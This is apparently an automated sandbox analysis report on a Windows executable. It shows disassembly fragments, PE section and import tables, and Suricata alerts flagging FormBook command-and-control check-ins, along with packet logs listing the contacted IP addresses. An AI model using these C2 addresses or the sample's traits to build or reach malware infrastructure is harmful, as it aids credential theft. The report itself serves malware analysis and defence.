                                                                                                                                                                                                                                                                                inc ecx
                                                                                                                                                                                                                                                                                mov eax, dword ptr [eax+08h]
                                                                                                                                                                                                                                                                                dec ebp
                                                                                                                                                                                                                                                                                arpl word ptr [eax+04h], dx
                                                                                                                                                                                                                                                                                neg eax
                                                                                                                                                                                                                                                                                dec esp
                                                                                                                                                                                                                                                                                add edx, ecx
                                                                                                                                                                                                                                                                                dec eax
                                                                                                                                                                                                                                                                                arpl ax, cx
                                                                                                                                                                                                                                                                                dec esp
                                                                                                                                                                                                                                                                                and edx, ecx
                                                                                                                                                                                                                                                                                dec ecx
                                                                                                                                                                                                                                                                                arpl bx, ax
                                                                                                                                                                                                                                                                                dec edx
                                                                                                                                                                                                                                                                                mov edx, dword ptr [eax+edx]
                                                                                                                                                                                                                                                                                dec eax
                                                                                                                                                                                                                                                                                mov eax, dword ptr [ebx+10h]
                                                                                                                                                                                                                                                                                mov ecx, dword ptr [eax+08h]
                                                                                                                                                                                                                                                                                dec eax
                                                                                                                                                                                                                                                                                mov eax, dword ptr [ebx+08h]
                                                                                                                                                                                                                                                                                test byte ptr [ecx+eax+03h], 0000000Fh
                                                                                                                                                                                                                                                                                je 00007FD30D716B6Dh
                                                                                                                                                                                                                                                                                movzx eax, byte ptr [ecx+eax+03h]
                                                                                                                                                                                                                                                                                and eax, FFFFFFF0h
                                                                                                                                                                                                                                                                                dec esp
                                                                                                                                                                                                                                                                                add ecx, eax
                                                                                                                                                                                                                                                                                dec esp
                                                                                                                                                                                                                                                                                xor ecx, edx
                                                                                                                                                                                                                                                                                dec ecx
                                                                                                                                                                                                                                                                                mov ecx, ecx
                                                                                                                                                                                                                                                                                pop ebx
                                                                                                                                                                                                                                                                                jmp 00007FD30D716B76h
                                                                                                                                                                                                                                                                                int3
                                                                                                                                                                                                                                                                                int3
                                                                                                                                                                                                                                                                                int3
                                                                                                                                                                                                                                                                                int3
                                                                                                                                                                                                                                                                                int3
                                                                                                                                                                                                                                                                                int3
                                                                                                                                                                                                                                                                                int3
                                                                                                                                                                                                                                                                                nop word ptr [eax+eax+00000000h]
                                                                                                                                                                                                                                                                                dec eax
                                                                                                                                                                                                                                                                                cmp ecx, dword ptr [00000049h]

                                                                                                                                                                                                                                                                                Data Directories

                                                                                                                                                                                                                                                                                NameVirtual AddressVirtual Size Is in Section
                                                                                                                                                                                                                                                                                IMAGE_DIRECTORY_ENTRY_EXPORT0x17f3c00x5c.rdata
                                                                                                                                                                                                                                                                                IMAGE_DIRECTORY_ENTRY_IMPORT0x17f41c0xf0.rdata
                                                                                                                                                                                                                                                                                IMAGE_DIRECTORY_ENTRY_RESOURCE0x19c0000x2eac4.rsrc
                                                                                                                                                                                                                                                                                IMAGE_DIRECTORY_ENTRY_EXCEPTION0x18f0000xcdec.pdata
                                                                                                                                                                                                                                                                                IMAGE_DIRECTORY_ENTRY_SECURITY0x18b8000x1e60.data
                                                                                                                                                                                                                                                                                IMAGE_DIRECTORY_ENTRY_BASERELOC0x1cb0000x5b8.reloc
                                                                                                                                                                                                                                                                                IMAGE_DIRECTORY_ENTRY_DEBUG0x165ae00x54.rdata
                                                                                                                                                                                                                                                                                IMAGE_DIRECTORY_ENTRY_COPYRIGHT0x00x0
                                                                                                                                                                                                                                                                                IMAGE_DIRECTORY_ENTRY_GLOBALPTR0x00x0
                                                                                                                                                                                                                                                                                IMAGE_DIRECTORY_ENTRY_TLS0x165d000x28.rdata
                                                                                                                                                                                                                                                                                IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG0x1659a00x140.rdata
                                                                                                                                                                                                                                                                                IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT0x00x0
                                                                                                                                                                                                                                                                                IMAGE_DIRECTORY_ENTRY_IAT0x11a0000x6a0.rdata
                                                                                                                                                                                                                                                                                IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT0x00x0
                                                                                                                                                                                                                                                                                IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR0x00x0
                                                                                                                                                                                                                                                                                IMAGE_DIRECTORY_ENTRY_RESERVED0x00x0

                                                                                                                                                                                                                                                                                Sections

                                                                                                                                                                                                                                                                                NameVirtual AddressVirtual SizeRaw SizeMD5Xored PEZLIB ComplexityFile TypeEntropyCharacteristics
                                                                                                                                                                                                                                                                                .text0x10000x6f1880x6f20016824105689e93571b28f6d652acf3f1False0.45466728768278963data6.6338226603175485IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
                                                                                                                                                                                                                                                                                .managed0x710000x77a280x77c00459fe8e4d0429964edfb07e39e66b232False0.46850331093423797data6.473781869755907IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
                                                                                                                                                                                                                                                                                hydrated0xe90000x304980x0d41d8cd98f00b204e9800998ecf8427eFalse0empty0.0IMAGE_SCN_CNT_UNINITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                                                                                                                                                                                                                                                                                .rdata0x11a0000x66c6a0x66e00a4f6a29290662b437a865514bcf05f6cFalse0.488105634872418data6.7027087254675255IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
                                                                                                                                                                                                                                                                                .data0x1810000xd5a80x18009d5075bd44b367f703d8e922b003398aFalse0.2294921875data3.190641782829915IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                                                                                                                                                                                                                                                                                .pdata0x18f0000xcdec0xce00638451eb673a6cdf25f666b19f1b8bb4False0.49419751213592233data6.064103613023274IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
                                                                                                                                                                                                                                                                                .rsrc0x19c0000x2eac40x2ec006d3dc884e9811facd65d86d807ddff66False0.9950388536096256data7.997171322620239IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
                                                                                                                                                                                                                                                                                .reloc0x1cb0000x5b80x600adcf9b9e4d3994d1018ad464f4f1db74False0.5826822916666666data5.215191968056739IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_READ

                                                                                                                                                                                                                                                                                Resources

                                                                                                                                                                                                                                                                                NameRVASizeTypeLanguageCountryZLIB Complexity
                                                                                                                                                                                                                                                                                BINARY0x19c1180x2e484data1.0003481526807756
                                                                                                                                                                                                                                                                                RT_VERSION0x1ca59c0x33cdata0.38405797101449274
                                                                                                                                                                                                                                                                                RT_MANIFEST0x1ca8d80x1eaXML 1.0 document, Unicode text, UTF-8 (with BOM) text, with CRLF line terminators0.5489795918367347

                                                                                                                                                                                                                                                                                Imports

                                                                                                                                                                                                                                                                                DLLImport
                                                                                                                                                                                                                                                                                ADVAPI32.dllRegOpenKeyExW, RegQueryValueExW, RegSetValueExW, RegCloseKey, OpenProcessToken, LookupPrivilegeValueW, AdjustTokenPrivileges, RegEnumValueW
                                                                                                                                                                                                                                                                                bcrypt.dllBCryptCloseAlgorithmProvider, BCryptGenerateSymmetricKey, BCryptDestroyKey, BCryptOpenAlgorithmProvider, BCryptGenRandom
                                                                                                                                                                                                                                                                                KERNEL32.dllTlsFree, TlsSetValue, TlsGetValue, TlsAlloc, InitializeCriticalSectionAndSpinCount, EncodePointer, GetConsoleWindow, FreeConsole, AllocConsole, SetLastError, GetLastError, LocalFree, CloseHandle, ExitProcess, GetTickCount64, FormatMessageW, K32EnumProcessModulesEx, IsWow64Process, GetExitCodeProcess, OpenProcess, K32EnumProcesses, K32GetModuleInformation, K32GetModuleBaseNameW, K32GetModuleFileNameExW, GetProcessId, DuplicateHandle, GetCurrentProcess, CloseThreadpoolIo, GetCurrentProcessId, MultiByteToWideChar, GetStdHandle, RaiseFailFastException, GetCalendarInfoEx, CompareStringOrdinal, CompareStringEx, FindNLSStringEx, GetLocaleInfoEx, ResolveLocaleName, FindStringOrdinal, GetCurrentThread, Sleep, DeleteCriticalSection, EnterCriticalSection, SleepConditionVariableCS, LeaveCriticalSection, WakeConditionVariable, QueryPerformanceCounter, InitializeCriticalSection, InitializeConditionVariable, WaitForMultipleObjectsEx, QueryPerformanceFrequency, GetFullPathNameW, GetLongPathNameW, WideCharToMultiByte, LocalAlloc, GetConsoleOutputCP, GetProcAddress, LocaleNameToLCID, LCMapStringEx, EnumTimeFormatsEx, EnumCalendarInfoExEx, CreateFileW, CreateThreadpoolIo, StartThreadpoolIo, CancelThreadpoolIo, DeleteFileW, DeviceIoControl, ExpandEnvironmentStringsW, FindClose, FindFirstFileExW, FlushFileBuffers, FreeLibrary, GetFileAttributesExW, GetFileInformationByHandleEx, GetFileType, GetModuleFileNameW, GetOverlappedResult, LoadLibraryExW, ReadFile, SetFileInformationByHandle, SetThreadErrorMode, GetThreadPriority, SetThreadPriority, WriteFile, GetCurrentProcessorNumberEx, SetEvent, CreateEventExW, GetEnvironmentVariableW, FlushProcessWriteBuffers, WaitForSingleObjectEx, RtlVirtualUnwind, RtlCaptureContext, RtlRestoreContext, AddVectoredExceptionHandler, FlsAlloc, FlsGetValue, FlsSetValue, CreateEventW, TerminateProcess, SwitchToThread, CreateThread, GetCurrentThreadId, SuspendThread, ResumeThread, GetThreadContext, SetThreadContext, FlushInstructionCache, VirtualAlloc, VirtualProtect, VirtualFree, QueryInformationJobObject, GetModuleHandleW, GetModuleHandleExW, GetProcessAffinityMask, InitializeContext, GetEnabledXStateFeatures, SetXStateFeaturesMask, InitializeCriticalSectionEx, VirtualQuery, GetSystemTimeAsFileTime, ResetEvent, DebugBreak, WaitForSingleObject, SleepEx, GlobalMemoryStatusEx, GetSystemInfo, GetLogicalProcessorInformation, GetLogicalProcessorInformationEx, GetLargePageMinimum, VirtualUnlock, VirtualAllocExNuma, IsProcessInJob, GetNumaHighestNodeNumber, GetProcessGroupAffinity, K32GetProcessMemoryInfo, RaiseException, RtlPcToFileHeader, RtlUnwindEx, IsProcessorFeaturePresent, SetUnhandledExceptionFilter, UnhandledExceptionFilter, IsDebuggerPresent, RtlLookupFunctionEntry, InitializeSListHead
                                                                                                                                                                                                                                                                                ole32.dllCoGetApartmentType, CoTaskMemAlloc, CoUninitialize, CoInitializeEx, CoTaskMemFree, CoWaitForMultipleHandles
                                                                                                                                                                                                                                                                                api-ms-win-crt-heap-l1-1-0.dllmalloc, free, _callnewh, calloc, _set_new_mode
                                                                                                                                                                                                                                                                                api-ms-win-crt-math-l1-1-0.dll__setusermatherr
                                                                                                                                                                                                                                                                                api-ms-win-crt-string-l1-1-0.dllstrcmp, _stricmp, strcpy_s, strncpy_s, wcsncmp
                                                                                                                                                                                                                                                                                api-ms-win-crt-convert-l1-1-0.dllstrtoull
                                                                                                                                                                                                                                                                                api-ms-win-crt-runtime-l1-1-0.dll__p___wargv, _cexit, exit, terminate, _crt_atexit, _register_onexit_function, _initialize_onexit_table, __p___argc, _exit, abort, _initterm_e, _c_exit, _register_thread_local_exe_atexit_callback, _seh_filter_exe, _set_app_type, _initterm, _configure_wide_argv, _initialize_wide_environment, _get_initial_wide_environment
                                                                                                                                                                                                                                                                                api-ms-win-crt-stdio-l1-1-0.dll__stdio_common_vsprintf_s, __stdio_common_vfprintf, __p__commode, _set_fmode, __stdio_common_vsscanf, __acrt_iob_func
                                                                                                                                                                                                                                                                                api-ms-win-crt-locale-l1-1-0.dll_configthreadlocale

                                                                                                                                                                                                                                                                                Network Behavior

                                                                                                                                                                                                                                                                                Suricata IDS Alerts

                                                                                                                                                                                                                                                                                TimestampSIDSignatureSeveritySource IPSource PortDest IPDest PortProtocol
                                                                                                                                                                                                                                                                                2024-10-08T16:01:28.541848+02002031412ET MALWARE FormBook CnC Checkin (GET)1192.168.11.204975191.195.240.1980TCP
                                                                                                                                                                                                                                                                                2024-10-08T16:01:28.541848+02002031449ET MALWARE FormBook CnC Checkin (GET)1192.168.11.204975191.195.240.1980TCP
                                                                                                                                                                                                                                                                                2024-10-08T16:01:28.541848+02002031453ET MALWARE FormBook CnC Checkin (GET)1192.168.11.204975191.195.240.1980TCP
                                                                                                                                                                                                                                                                                2024-10-08T16:01:28.541848+02002031412ET MALWARE FormBook CnC Checkin (GET)1192.168.11.204973952.206.163.16280TCP
                                                                                                                                                                                                                                                                                2024-10-08T16:01:28.541848+02002031449ET MALWARE FormBook CnC Checkin (GET)1192.168.11.204973952.206.163.16280TCP
                                                                                                                                                                                                                                                                                2024-10-08T16:01:28.541848+02002031453ET MALWARE FormBook CnC Checkin (GET)1192.168.11.204973952.206.163.16280TCP
                                                                                                                                                                                                                                                                                2024-10-08T16:01:28.541848+02002031412ET MALWARE FormBook CnC Checkin (GET)1192.168.11.2049743104.247.81.17480TCP
                                                                                                                                                                                                                                                                                2024-10-08T16:01:28.541848+02002031449ET MALWARE FormBook CnC Checkin (GET)1192.168.11.2049743104.247.81.17480TCP
                                                                                                                                                                                                                                                                                2024-10-08T16:01:28.541848+02002031453ET MALWARE FormBook CnC Checkin (GET)1192.168.11.2049743104.247.81.17480TCP
                                                                                                                                                                                                                                                                                2024-10-08T16:01:28.541848+02002031412ET MALWARE FormBook CnC Checkin (GET)1192.168.11.2049745198.185.159.14480TCP
                                                                                                                                                                                                                                                                                2024-10-08T16:01:28.541848+02002031449ET MALWARE FormBook CnC Checkin (GET)1192.168.11.2049745198.185.159.14480TCP
                                                                                                                                                                                                                                                                                2024-10-08T16:01:28.541848+02002031453ET MALWARE FormBook CnC Checkin (GET)1192.168.11.2049745198.185.159.14480TCP
                                                                                                                                                                                                                                                                                2024-10-08T16:02:10.388618+02002031412ET MALWARE FormBook CnC Checkin (GET)1192.168.11.2049736172.66.0.7080TCP
                                                                                                                                                                                                                                                                                2024-10-08T16:02:10.388618+02002031449ET MALWARE FormBook CnC Checkin (GET)1192.168.11.2049736172.66.0.7080TCP
                                                                                                                                                                                                                                                                                2024-10-08T16:02:10.388618+02002031453ET MALWARE FormBook CnC Checkin (GET)1192.168.11.2049736172.66.0.7080TCP
                                                                                                                                                                                                                                                                                2024-10-08T16:02:32.269097+02002031412ET MALWARE FormBook CnC Checkin (GET)1192.168.11.2049738104.18.188.22380TCP
                                                                                                                                                                                                                                                                                2024-10-08T16:02:32.269097+02002031449ET MALWARE FormBook CnC Checkin (GET)1192.168.11.2049738104.18.188.22380TCP
                                                                                                                                                                                                                                                                                2024-10-08T16:02:32.269097+02002031453ET MALWARE FormBook CnC Checkin (GET)1192.168.11.2049738104.18.188.22380TCP
                                                                                                                                                                                                                                                                                2024-10-08T16:03:11.963231+02002031412ET MALWARE FormBook CnC Checkin (GET)1192.168.11.2049740198.185.159.14480TCP
                                                                                                                                                                                                                                                                                2024-10-08T16:03:11.963231+02002031449ET MALWARE FormBook CnC Checkin (GET)1192.168.11.2049740198.185.159.14480TCP
                                                                                                                                                                                                                                                                                2024-10-08T16:03:11.963231+02002031453ET MALWARE FormBook CnC Checkin (GET)1192.168.11.2049740198.185.159.14480TCP
                                                                                                                                                                                                                                                                                2024-10-08T16:03:32.429473+02002031412ET MALWARE FormBook CnC Checkin (GET)1192.168.11.2049741172.67.143.21180TCP
                                                                                                                                                                                                                                                                                2024-10-08T16:03:32.429473+02002031449ET MALWARE FormBook CnC Checkin (GET)1192.168.11.2049741172.67.143.21180TCP
                                                                                                                                                                                                                                                                                2024-10-08T16:03:32.429473+02002031453ET MALWARE FormBook CnC Checkin (GET)1192.168.11.2049741172.67.143.21180TCP
                                                                                                                                                                                                                                                                                2024-10-08T16:03:54.707781+02002031412ET MALWARE FormBook CnC Checkin (GET)1192.168.11.2049742103.235.47.18880TCP
                                                                                                                                                                                                                                                                                2024-10-08T16:03:54.707781+02002031449ET MALWARE FormBook CnC Checkin (GET)1192.168.11.2049742103.235.47.18880TCP
                                                                                                                                                                                                                                                                                2024-10-08T16:03:54.707781+02002031453ET MALWARE FormBook CnC Checkin (GET)1192.168.11.2049742103.235.47.18880TCP
                                                                                                                                                                                                                                                                                2024-10-08T16:04:54.803703+02002031412ET MALWARE FormBook CnC Checkin (GET)1192.168.11.204974413.248.252.11480TCP
                                                                                                                                                                                                                                                                                2024-10-08T16:04:54.803703+02002031449ET MALWARE FormBook CnC Checkin (GET)1192.168.11.204974413.248.252.11480TCP
                                                                                                                                                                                                                                                                                2024-10-08T16:04:54.803703+02002031453ET MALWARE FormBook CnC Checkin (GET)1192.168.11.204974413.248.252.11480TCP
                                                                                                                                                                                                                                                                                2024-10-08T16:06:37.473281+02002031412ET MALWARE FormBook CnC Checkin (GET)1192.168.11.2049746172.67.130.4680TCP
                                                                                                                                                                                                                                                                                2024-10-08T16:06:37.473281+02002031449ET MALWARE FormBook CnC Checkin (GET)1192.168.11.2049746172.67.130.4680TCP
                                                                                                                                                                                                                                                                                2024-10-08T16:06:37.473281+02002031453ET MALWARE FormBook CnC Checkin (GET)1192.168.11.2049746172.67.130.4680TCP
                                                                                                                                                                                                                                                                                2024-10-08T16:06:58.163499+02002031412ET MALWARE FormBook CnC Checkin (GET)1192.168.11.204974763.141.128.1680TCP
                                                                                                                                                                                                                                                                                2024-10-08T16:06:58.163499+02002031449ET MALWARE FormBook CnC Checkin (GET)1192.168.11.204974763.141.128.1680TCP
                                                                                                                                                                                                                                                                                2024-10-08T16:06:58.163499+02002031453ET MALWARE FormBook CnC Checkin (GET)1192.168.11.204974763.141.128.1680TCP
                                                                                                                                                                                                                                                                                2024-10-08T16:07:18.445512+02002031412ET MALWARE FormBook CnC Checkin (GET)1192.168.11.204974813.248.169.4880TCP
                                                                                                                                                                                                                                                                                2024-10-08T16:07:18.445512+02002031449ET MALWARE FormBook CnC Checkin (GET)1192.168.11.204974813.248.169.4880TCP
                                                                                                                                                                                                                                                                                2024-10-08T16:07:18.445512+02002031453ET MALWARE FormBook CnC Checkin (GET)1192.168.11.204974813.248.169.4880TCP
                                                                                                                                                                                                                                                                                2024-10-08T16:07:41.823141+02002031412ET MALWARE FormBook CnC Checkin (GET)1192.168.11.20497493.33.130.19080TCP
                                                                                                                                                                                                                                                                                2024-10-08T16:07:41.823141+02002031449ET MALWARE FormBook CnC Checkin (GET)1192.168.11.20497493.33.130.19080TCP
                                                                                                                                                                                                                                                                                2024-10-08T16:07:41.823141+02002031453ET MALWARE FormBook CnC Checkin (GET)1192.168.11.20497493.33.130.19080TCP
                                                                                                                                                                                                                                                                                2024-10-08T16:09:01.277884+02002031412ET MALWARE FormBook CnC Checkin (GET)1192.168.11.2049750192.250.227.2780TCP
                                                                                                                                                                                                                                                                                2024-10-08T16:09:01.277884+02002031449ET MALWARE FormBook CnC Checkin (GET)1192.168.11.2049750192.250.227.2780TCP
                                                                                                                                                                                                                                                                                2024-10-08T16:09:01.277884+02002031453ET MALWARE FormBook CnC Checkin (GET)1192.168.11.2049750192.250.227.2780TCP
                                                                                                                                                                                                                                                                                2024-10-08T16:10:24.466524+02002031412ET MALWARE FormBook CnC Checkin (GET)1192.168.11.204975213.248.252.11480TCP
                                                                                                                                                                                                                                                                                2024-10-08T16:10:24.466524+02002031449ET MALWARE FormBook CnC Checkin (GET)1192.168.11.204975213.248.252.11480TCP
                                                                                                                                                                                                                                                                                2024-10-08T16:10:24.466524+02002031453ET MALWARE FormBook CnC Checkin (GET)1192.168.11.204975213.248.252.11480TCP

                                                                                                                                                                                                                                                                                Network Port Distribution

                                                                                                                                                                                                                                                                                TCP Packets

                                                                                                                                                                                                                                                                                TimestampSource PortDest PortSource IPDest IP
                                                                                                                                                                                                                                                                                Oct 8, 2024 16:02:10.175939083 CEST4973680192.168.11.20172.66.0.70
                                                                                                                                                                                                                                                                                Oct 8, 2024 16:02:10.271034956 CEST8049736172.66.0.70192.168.11.20
                                                                                                                                                                                                                                                                                Oct 8, 2024 16:02:10.271384954 CEST4973680192.168.11.20172.66.0.70
                                                                                                                                                                                                                                                                                Oct 8, 2024 16:02:10.271385908 CEST4973680192.168.11.20172.66.0.70
                                                                                                                                                                                                                                                                                Oct 8, 2024 16:02:10.366514921 CEST8049736172.66.0.70192.168.11.20
                                                                                                                                                                                                                                                                                Oct 8, 2024 16:02:10.387456894 CEST8049736172.66.0.70192.168.11.20
                                                                                                                                                                                                                                                                                Oct 8, 2024 16:02:10.387984037 CEST4973680192.168.11.20172.66.0.70
                                                                                                                                                                                                                                                                                Oct 8, 2024 16:02:10.388391972 CEST8049736172.66.0.70192.168.11.20
                                                                                                                                                                                                                                                                                Oct 8, 2024 16:02:10.388617992 CEST4973680192.168.11.20172.66.0.70
                                                                                                                                                                                                                                                                                Oct 8, 2024 16:02:10.483177900 CEST8049736172.66.0.70192.168.11.20
                                                                                                                                                                                                                                                                                Oct 8, 2024 16:02:32.063893080 CEST4973880192.168.11.20104.18.188.223
                                                                                                                                                                                                                                                                                Oct 8, 2024 16:02:32.158890963 CEST8049738104.18.188.223192.168.11.20
                                                                                                                                                                                                                                                                                Oct 8, 2024 16:02:32.159260035 CEST4973880192.168.11.20104.18.188.223
                                                                                                                                                                                                                                                                                Oct 8, 2024 16:02:32.159362078 CEST4973880192.168.11.20104.18.188.223
                                                                                                                                                                                                                                                                                Oct 8, 2024 16:02:32.254076958 CEST8049738104.18.188.223192.168.11.20
                                                                                                                                                                                                                                                                                Oct 8, 2024 16:02:32.268712044 CEST8049738104.18.188.223192.168.11.20
                                                                                                                                                                                                                                                                                Oct 8, 2024 16:02:32.268908024 CEST8049738104.18.188.223192.168.11.20
                                                                                                                                                                                                                                                                                Oct 8, 2024 16:02:32.269097090 CEST4973880192.168.11.20104.18.188.223
                                                                                                                                                                                                                                                                                Oct 8, 2024 16:02:32.269097090 CEST4973880192.168.11.20104.18.188.223
                                                                                                                                                                                                                                                                                Oct 8, 2024 16:02:32.363869905 CEST8049738104.18.188.223192.168.11.20
                                                                                                                                                                                                                                                                                Oct 8, 2024 16:02:51.323533058 CEST4973980192.168.11.2052.206.163.162
                                                                                                                                                                                                                                                                                Oct 8, 2024 16:02:51.423594952 CEST804973952.206.163.162192.168.11.20
                                                                                                                                                                                                                                                                                Oct 8, 2024 16:02:51.423759937 CEST4973980192.168.11.2052.206.163.162
                                                                                                                                                                                                                                                                                Oct 8, 2024 16:02:51.423815966 CEST4973980192.168.11.2052.206.163.162
                                                                                                                                                                                                                                                                                Oct 8, 2024 16:02:51.523273945 CEST804973952.206.163.162192.168.11.20
                                                                                                                                                                                                                                                                                Oct 8, 2024 16:02:51.523401022 CEST804973952.206.163.162192.168.11.20
                                                                                                                                                                                                                                                                                Oct 8, 2024 16:02:51.523411989 CEST804973952.206.163.162192.168.11.20
                                                                                                                                                                                                                                                                                Oct 8, 2024 16:02:51.523613930 CEST4973980192.168.11.2052.206.163.162
                                                                                                                                                                                                                                                                                Oct 8, 2024 16:02:51.523643970 CEST4973980192.168.11.2052.206.163.162
                                                                                                                                                                                                                                                                                Oct 8, 2024 16:02:51.623208046 CEST804973952.206.163.162192.168.11.20
                                                                                                                                                                                                                                                                                Oct 8, 2024 16:03:11.769161940 CEST4974080192.168.11.20198.185.159.144
                                                                                                                                                                                                                                                                                Oct 8, 2024 16:03:11.864430904 CEST8049740198.185.159.144192.168.11.20
                                                                                                                                                                                                                                                                                Oct 8, 2024 16:03:11.864604950 CEST4974080192.168.11.20198.185.159.144
                                                                                                                                                                                                                                                                                Oct 8, 2024 16:03:11.864633083 CEST4974080192.168.11.20198.185.159.144
                                                                                                                                                                                                                                                                                Oct 8, 2024 16:03:11.959901094 CEST8049740198.185.159.144192.168.11.20
                                                                                                                                                                                                                                                                                Oct 8, 2024 16:03:11.962738991 CEST8049740198.185.159.144192.168.11.20
                                                                                                                                                                                                                                                                                Oct 8, 2024 16:03:11.962840080 CEST8049740198.185.159.144192.168.11.20
                                                                                                                                                                                                                                                                                Oct 8, 2024 16:03:11.962945938 CEST8049740198.185.159.144192.168.11.20
                                                                                                                                                                                                                                                                                Oct 8, 2024 16:03:11.963164091 CEST4974080192.168.11.20198.185.159.144
                                                                                                                                                                                                                                                                                Oct 8, 2024 16:03:11.963231087 CEST4974080192.168.11.20198.185.159.144
                                                                                                                                                                                                                                                                                Oct 8, 2024 16:03:12.059787989 CEST8049740198.185.159.144192.168.11.20
                                                                                                                                                                                                                                                                                Oct 8, 2024 16:03:32.222038984 CEST4974180192.168.11.20172.67.143.211
                                                                                                                                                                                                                                                                                Oct 8, 2024 16:03:32.317173958 CEST8049741172.67.143.211192.168.11.20
                                                                                                                                                                                                                                                                                Oct 8, 2024 16:03:32.317357063 CEST4974180192.168.11.20172.67.143.211
                                                                                                                                                                                                                                                                                Oct 8, 2024 16:03:32.317439079 CEST4974180192.168.11.20172.67.143.211
                                                                                                                                                                                                                                                                                Oct 8, 2024 16:03:32.412271976 CEST8049741172.67.143.211192.168.11.20
                                                                                                                                                                                                                                                                                Oct 8, 2024 16:03:32.428450108 CEST8049741172.67.143.211192.168.11.20
                                                                                                                                                                                                                                                                                Oct 8, 2024 16:03:32.428823948 CEST4974180192.168.11.20172.67.143.211
                                                                                                                                                                                                                                                                                Oct 8, 2024 16:03:32.429305077 CEST8049741172.67.143.211192.168.11.20
                                                                                                                                                                                                                                                                                Oct 8, 2024 16:03:32.429472923 CEST4974180192.168.11.20172.67.143.211
                                                                                                                                                                                                                                                                                Oct 8, 2024 16:03:32.523859978 CEST8049741172.67.143.211192.168.11.20
                                                                                                                                                                                                                                                                                Oct 8, 2024 16:05:35.645068884 CEST4974580192.168.11.20198.185.159.144
                                                                                                                                                                                                                                                                                Oct 8, 2024 16:05:35.745217085 CEST8049745198.185.159.144192.168.11.20
                                                                                                                                                                                                                                                                                Oct 8, 2024 16:05:35.745511055 CEST4974580192.168.11.20198.185.159.144
                                                                                                                                                                                                                                                                                Oct 8, 2024 16:05:35.745574951 CEST4974580192.168.11.20198.185.159.144
                                                                                                                                                                                                                                                                                Oct 8, 2024 16:05:35.846487999 CEST8049745198.185.159.144192.168.11.20
                                                                                                                                                                                                                                                                                Oct 8, 2024 16:05:35.847243071 CEST8049745198.185.159.144192.168.11.20
                                                                                                                                                                                                                                                                                Oct 8, 2024 16:05:35.847323895 CEST8049745198.185.159.144192.168.11.20
                                                                                                                                                                                                                                                                                Oct 8, 2024 16:05:35.847346067 CEST8049745198.185.159.144192.168.11.20
                                                                                                                                                                                                                                                                                Oct 8, 2024 16:05:35.847558975 CEST4974580192.168.11.20198.185.159.144
                                                                                                                                                                                                                                                                                Oct 8, 2024 16:05:35.847697973 CEST4974580192.168.11.20198.185.159.144
                                                                                                                                                                                                                                                                                Oct 8, 2024 16:05:35.944434881 CEST8049745198.185.159.144192.168.11.20

                                                                                                                                                                                                                                                                                UDP Packets

                                                                                                                                                                                                                                                                                TimestampSource PortDest PortSource IPDest IP
                                                                                                                                                                                                                                                                                Oct 8, 2024 16:02:10.005553961 CEST6174753192.168.11.201.1.1.1
                                                                                                                                                                                                                                                                                Oct 8, 2024 16:02:10.175179958 CEST53617471.1.1.1192.168.11.20
                                                                                                                                                                                                                                                                                Oct 8, 2024 16:02:31.779261112 CEST5422553192.168.11.201.1.1.1
                                                                                                                                                                                                                                                                                Oct 8, 2024 16:02:32.063143015 CEST53542251.1.1.1192.168.11.20
                                                                                                                                                                                                                                                                                Oct 8, 2024 16:02:51.165275097 CEST6204053192.168.11.201.1.1.1
                                                                                                                                                                                                                                                                                Oct 8, 2024 16:02:51.322936058 CEST53620401.1.1.1192.168.11.20
                                                                                                                                                                                                                                                                                Oct 8, 2024 16:03:11.551325083 CEST5842653192.168.11.201.1.1.1
                                                                                                                                                                                                                                                                                Oct 8, 2024 16:03:11.768527985 CEST53584261.1.1.1192.168.11.20
                                                                                                                                                                                                                                                                                Oct 8, 2024 16:03:32.109369993 CEST5676753192.168.11.201.1.1.1
                                                                                                                                                                                                                                                                                Oct 8, 2024 16:03:32.221383095 CEST53567671.1.1.1192.168.11.20
                                                                                                                                                                                                                                                                                Oct 8, 2024 16:03:52.651804924 CEST5708853192.168.11.201.1.1.1
                                                                                                                                                                                                                                                                                Oct 8, 2024 16:03:53.666908979 CEST5708853192.168.11.209.9.9.9
                                                                                                                                                                                                                                                                                Oct 8, 2024 16:03:54.085376024 CEST53570881.1.1.1192.168.11.20
                                                                                                                                                                                                                                                                                Oct 8, 2024 16:03:56.709516048 CEST53570889.9.9.9192.168.11.20
                                                                                                                                                                                                                                                                                Oct 8, 2024 16:04:13.194088936 CEST5290253192.168.11.201.1.1.1
                                                                                                                                                                                                                                                                                Oct 8, 2024 16:04:13.310894966 CEST53529021.1.1.1192.168.11.20
                                                                                                                                                                                                                                                                                Oct 8, 2024 16:04:54.278876066 CEST4946653192.168.11.201.1.1.1
                                                                                                                                                                                                                                                                                Oct 8, 2024 16:04:54.440768957 CEST53494661.1.1.1192.168.11.20
                                                                                                                                                                                                                                                                                Oct 8, 2024 16:05:14.821263075 CEST5703153192.168.11.201.1.1.1
                                                                                                                                                                                                                                                                                Oct 8, 2024 16:05:14.925124884 CEST53570311.1.1.1192.168.11.20
                                                                                                                                                                                                                                                                                Oct 8, 2024 16:05:35.412019014 CEST5956353192.168.11.201.1.1.1
                                                                                                                                                                                                                                                                                Oct 8, 2024 16:05:35.644350052 CEST53595631.1.1.1192.168.11.20
                                                                                                                                                                                                                                                                                Oct 8, 2024 16:05:55.952914000 CEST5367153192.168.11.201.1.1.1
                                                                                                                                                                                                                                                                                Oct 8, 2024 16:05:56.084242105 CEST53536711.1.1.1192.168.11.20
                                                                                                                                                                                                                                                                                Oct 8, 2024 16:06:16.495239019 CEST5745153192.168.11.201.1.1.1
                                                                                                                                                                                                                                                                                Oct 8, 2024 16:06:17.135902882 CEST53574511.1.1.1192.168.11.20
